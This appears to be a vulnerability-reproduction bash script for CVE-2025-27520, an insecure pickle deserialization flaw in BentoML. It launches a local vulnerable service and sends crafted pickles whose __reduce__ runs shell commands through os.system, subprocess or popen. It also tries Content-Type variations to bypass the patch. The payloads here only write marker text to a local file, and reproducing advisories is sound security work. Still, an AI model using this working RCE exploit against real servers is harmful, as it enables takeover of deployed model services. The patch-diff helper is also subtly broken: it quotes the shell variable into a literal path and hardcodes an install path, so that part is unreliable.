#!/usr/bin/env bash
set -euo pipefail

# Reproduction script for GHSA-33xw-247w-6hmc / CVE-2025-27520
# BentoML <=1.4.2 insecure deserialization via application/vnd.bentoml+pickle
# Exit codes: 0 = reproduced, 1 = not reproduced

SCRIPT_PATH="$(readlink -f "$0")"
BASE_DIR="$(dirname "$SCRIPT_PATH")"
LOG_DIR="$BASE_DIR/logs"
WORK_DIR="$BASE_DIR/work"
REPORT_DIR="$BASE_DIR/../repro"
PYTHON_BIN="python3"
PIP_BIN="pip3"
PORT=3000
PATCHED_PORT=3001
HOST="127.0.0.1"
PID_FILE="$LOG_DIR/server.pid"
PID_FILE_PATCHED="$LOG_DIR/server_patched.pid"
SERVER_LOG="$LOG_DIR/server.log"
SERVER_LOG_PATCHED="$LOG_DIR/server_patched.log"
ENV_LOG="$LOG_DIR/env.txt"
PROOF_FILE="$LOG_DIR/rce_proof.txt"
PROOF_FILE_PATCHED="$LOG_DIR/rce_proof_patched.txt"
PATCH_DIFF_LOG="$LOG_DIR/patch_diff_1.4.2_latest.txt"

mkdir -p "$LOG_DIR" "$WORK_DIR" "$REPORT_DIR"

log() { echo "[repro] $(date '+%F %T') - $*" | tee -a "$LOG_DIR/repro.log"; }

kill_pidfile() {
  local f="$1"
  if [[ -f "$f" ]]; then
    local pid
    pid=$(cat "$f" || true)
    if [[ -n "${pid}" ]] && kill -0 "$pid" 2>/dev/null; then
      kill "$pid" || true
      sleep 2
      kill -9 "$pid" 2>/dev/null || true
    fi
    rm -f "$f"
  fi
}

kill_port() {
  local port="$1"
  if command -v lsof >/dev/null 2>&1; then
    local pids
    pids=$(lsof -iTCP:${port} -sTCP:LISTEN -t 2>/dev/null || true)
    [[ -n "$pids" ]] && kill $pids 2>/dev/null || true
    sleep 1
    [[ -n "$pids" ]] && kill -9 $pids 2>/dev/null || true
  elif command -v ss >/dev/null 2>&1; then
    local pids
    pids=$(ss -lntp 2>/dev/null | awk -v port=":${port}" '$4 ~ port {print $6}' | sed 's/.*pid=\([0-9]*\).*/\1/' | sort -u || true)
    [[ -n "$pids" ]] && kill $pids 2>/dev/null || true
    sleep 1
    [[ -n "$pids" ]] && kill -9 $pids 2>/dev/null || true
  fi
}

kill_if_running() {
  kill_pidfile "$PID_FILE"
  kill_port "$PORT"
}

kill_if_running_patched() {
  kill_pidfile "$PID_FILE_PATCHED"
  kill_port "$PATCHED_PORT"
}

record_env() {
  {
    echo "=== System ==="
    uname -a || true
    echo
    echo "=== Python ==="
    command -v "$PYTHON_BIN" || true
    "$PYTHON_BIN" -V || true
    echo
    echo "=== Pip ==="
    command -v "$PIP_BIN" || true
    "$PIP_BIN" -V || true
    echo
    echo "=== Network (ports $PORT,$PATCHED_PORT) ==="
    ss -lntp 2>/dev/null || true
  } > "$ENV_LOG" 2>&1 || true
}

install_deps_vuln() {
  log "Installing vulnerable bentoml range (<1.4.3) and requests"
  "$PIP_BIN" install --upgrade pip wheel >/dev/null 2>&1 || true
  "$PIP_BIN" install "bentoml>=1.3.4,<1.4.3" requests >/dev/null 2>&1
  log "Installed vulnerable bentoml: $(python3 -c 'import bentoml;print(bentoml.__version__)')"
}

install_deps_patched() {
  log "Installing latest patched bentoml (>=1.4.3)"
  "$PIP_BIN" install --upgrade "bentoml>=1.4.3" requests >/dev/null 2>&1
  log "Installed patched bentoml: $(python3 -c 'import bentoml;print(bentoml.__version__)')"
}

create_service() {
  cat > "$WORK_DIR/service.py" << 'PY'
from __future__ import annotations
import bentoml

# Minimal service with a single API method. The vulnerability is triggered
# before this method executes, during request deserialization.
@bentoml.service()
class Summarization:
    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        # Echo back the inputs; business logic is irrelevant for the PoC
        return [str(t) for t in texts]
PY
}

start_server() {
  log "Starting BentoML service on ${HOST}:${PORT}"
  : > "$SERVER_LOG"
  nohup env PYTHONUNBUFFERED=1 PYTHONPATH="$WORK_DIR" \
    bentoml serve service:Summarization --host "$HOST" --port "$PORT" \
    >>"$SERVER_LOG" 2>&1 &
  echo $! > "$PID_FILE"
  log "Server started with pid $(cat "$PID_FILE")"
}

start_server_patched() {
  log "Starting patched BentoML service on ${HOST}:${PATCHED_PORT}"
  : > "$SERVER_LOG_PATCHED"
  nohup env PYTHONUNBUFFERED=1 PYTHONPATH="$WORK_DIR" \
    bentoml serve service:Summarization --host "$HOST" --port "$PATCHED_PORT" \
    >>"$SERVER_LOG_PATCHED" 2>&1 &
  echo $! > "$PID_FILE_PATCHED"
  log "Patched server started with pid $(cat "$PID_FILE_PATCHED")"
}

wait_for_server() {
  local port="$1"; local logf="$2"
  log "Waiting for server on port ${port} to become ready..."
  local deadline=$((SECONDS+90))
  while (( SECONDS < deadline )); do
    if curl -fsS "http://${HOST}:${port}/" >/dev/null 2>&1; then
      log "Server on ${port} is responding"
      return 0
    fi
    sleep 2
  done
  log "Server on ${port} did not become ready. Last 50 lines:"
  tail -n 50 "$logf" || true
  return 1
}

run_exploit_attempt() {
  local attempt_id="$1"; local marker="$2"; local log_file="$LOG_DIR/exploit_attempt_${attempt_id}.log"
  : > "$log_file"
  log "Attempt ${attempt_id}: sending malicious pickle with marker ${marker}"
  "$PYTHON_BIN" - "$HOST" "$PORT" "$marker" "$PROOF_FILE" "$attempt_id" << 'PY' >>"$log_file" 2>&1 || true
import sys, os, pickle, requests
host = sys.argv[1]
port = int(sys.argv[2])
marker = sys.argv[3]
proof_file = sys.argv[4]
attempt = sys.argv[5]
url = f"http://{host}:{port}/summarize"
headers = {'Content-Type': 'application/vnd.bentoml+pickle'}

class Evil:
    def __reduce__(self):
        if attempt == '1':
            return (__import__('os').system, (f"/bin/sh -lc 'echo {marker} >> {proof_file}'",))
        elif attempt == '2':
            return (__import__('subprocess').call, (["/bin/sh","-lc", f"echo {marker} >> {proof_file}"],))
        else:
            return (__import__('os').popen, (f"/bin/sh -lc 'echo {marker} >> {proof_file}'",))

payload = pickle.dumps(Evil(), protocol=4)
print(f"[*] Payload length: {len(payload)} bytes")
try:
    r = requests.post(url, data=payload, headers=headers, timeout=15)
    print(f"[*] Response: {r.status_code} {r.text[:200]!r}")
except Exception as e:
    print(f"[!] Request error: {e}")
PY
}

run_patched_bypass_suite() {
  : > "$PROOF_FILE_PATCHED"
  # 10 distinct variation attempts against patched server
  "$PYTHON_BIN" - "$HOST" "$PATCHED_PORT" "$PROOF_FILE_PATCHED" << 'PY' >>"$LOG_DIR/patched_attempts.log" 2>&1 || true
import sys, pickle, requests, time
host=sys.argv[1]
port=int(sys.argv[2])
proof_file=sys.argv[3]
url=f"http://{host}:{port}/summarize"
variations=[
    'application/vnd.bentoml+pickle',
    'Application/Vnd.BentoML+Pickle',
    'application/vnd.bentoml+pickle; charset=UTF-8',
    'application/vnd.bentoml+pickle; q=1',
    'application/vnd.bentoml+PICKLE',
    'application/vnd.bentoml+pickle ',
    'application/vnd.bentoml+pickle;param=x',
    'application/octet-stream',
    'text/plain',
    'application/vnd.bentoml+pickle, application/json',
]
class Evil:
    def __init__(self, cmd): self.cmd=cmd
    def __reduce__(self):
        return (__import__('os').system, (self.cmd,))
for i,ct in enumerate(variations,1):
    marker=f'PATCHED_TRY_{i}_{int(time.time()*1000)}'
    cmd=f"/bin/sh -lc 'echo {marker} >> {proof_file}'"
    payload=pickle.dumps(Evil(cmd), protocol=4)
    try:
        r=requests.post(url, data=payload, headers={'Content-Type': ct}, timeout=10)
        print(i, ct, r.status_code)
    except Exception as e:
        print(i, ct, 'error', e)
PY
}

verify_proof_contains() {
  local expected="$1"
  if [[ -f "$PROOF_FILE" ]] && grep -Fq "$expected" "$PROOF_FILE"; then
    return 0
  fi
  return 1
}

write_patch_analysis() {
  local patched_version
  patched_version="$(python3 -c 'import bentoml;print(bentoml.__version__)' 2>/dev/null || echo unknown)"
  local status="BLOCKED"
  if [[ -s "$PROOF_FILE_PATCHED" ]]; then
    status="STILL WORKS"
  fi
  cat > "$REPORT_DIR/patch_analysis.md" << EOF
# Patch Analysis - GHSA-33xw-247w-6hmc (CVE-2025-27520)

- Vulnerable version tested: 1.4.2 (installed via constraint <1.4.3)
- Latest patched version tested: ${patched_version}
- Patch verification result: ${status}

Artifacts:
- Server logs (vulnerable): ${SERVER_LOG}
- Server logs (patched): ${SERVER_LOG_PATCHED}
- Proof (vulnerable): ${PROOF_FILE}
- Proof (patched): ${PROOF_FILE_PATCHED}
- Serde patch diff: ${PATCH_DIFF_LOG}

Bypass attempts (10 variations of Content-Type) executed against patched server; see logs/patched_attempts.log
EOF
}

capture_patch_diff() {
  # Save serde.py from vulnerable and latest environments and diff them
  cp /usr/local/lib/python3.11/dist-packages/_bentoml_impl/serde.py "$LOG_DIR/serde_vuln_1.4.2.py" 2>/dev/null || true
  "$PIP_BIN" install --upgrade "bentoml>=1.4.3" >/dev/null 2>&1 || true
  python3 - << 'PY' >"$PATCH_DIFF_LOG" 2>/dev/null || true
import importlib, inspect, sys, difflib
try:
    import importlib
    m = importlib.import_module('_bentoml_impl.serde')
    patched_path = inspect.getsourcefile(m) or ''
except Exception:
    patched_path = ''
old = open('"$LOG_DIR"/serde_vuln_1.4.2.py','r',errors='ignore').read().splitlines(True) if open('"$LOG_DIR"/serde_vuln_1.4.2.py','r',errors='ignore') else []
new = open(patched_path,'r',errors='ignore').read().splitlines(True) if patched_path else []
sys.stdout.writelines(difflib.unified_diff(old,new,fromfile='serde_vuln_1.4.2.py',tofile='serde_patched_latest.py'))
PY
}

main() {
  record_env
  kill_if_running
  install_deps_vuln
  create_service
  start_server
  if ! wait_for_server "$PORT" "$SERVER_LOG"; then
    log "Server failed to start. Aborting."
    exit 1
  fi

  # Unique markers for idempotency
  local ts="$(date +%s%N)"
  local m1="RCE_ATTEMPT_1_${ts}"
  local m2="RCE_ATTEMPT_2_${ts}"
  local m3="RCE_ATTEMPT_3_${ts}"

  : > "$PROOF_FILE"
  run_exploit_attempt 1 "$m1"
  sleep 1
  run_exploit_attempt 2 "$m2"
  sleep 1
  run_exploit_attempt 3 "$m3"
  sleep 1

  log "Server log tail (vulnerable):"
  tail -n 80 "$SERVER_LOG" | sed 's/^/[server] /' | tee -a "$LOG_DIR/repro.log" >/dev/null || true

  local reproduced=0
  if verify_proof_contains "$m1" && verify_proof_contains "$m2" && verify_proof_contains "$m3"; then
    reproduced=0
  else
    reproduced=1
  fi

  if [[ $reproduced -eq 0 ]]; then
    log "SUCCESS: Insecure deserialization RCE reproduced on vulnerable version. Proof: $PROOF_FILE"
  else
    log "FAILURE: Exploit did not create expected markers on vulnerable version."
  fi

  # Stop vulnerable server
  kill_if_running

  # Optional patched verification (always run for documentation, does not affect exit code)
  install_deps_patched
  start_server_patched
  if wait_for_server "$PATCHED_PORT" "$SERVER_LOG_PATCHED"; then
    run_patched_bypass_suite
    log "Patched server log tail:"
    tail -n 80 "$SERVER_LOG_PATCHED" | sed 's/^/[server patched] /' | tee -a "$LOG_DIR/repro.log" >/dev/null || true
  fi
  kill_if_running_patched

  capture_patch_diff || true
  write_patch_analysis || true

  exit $reproduced
}

main "$@"
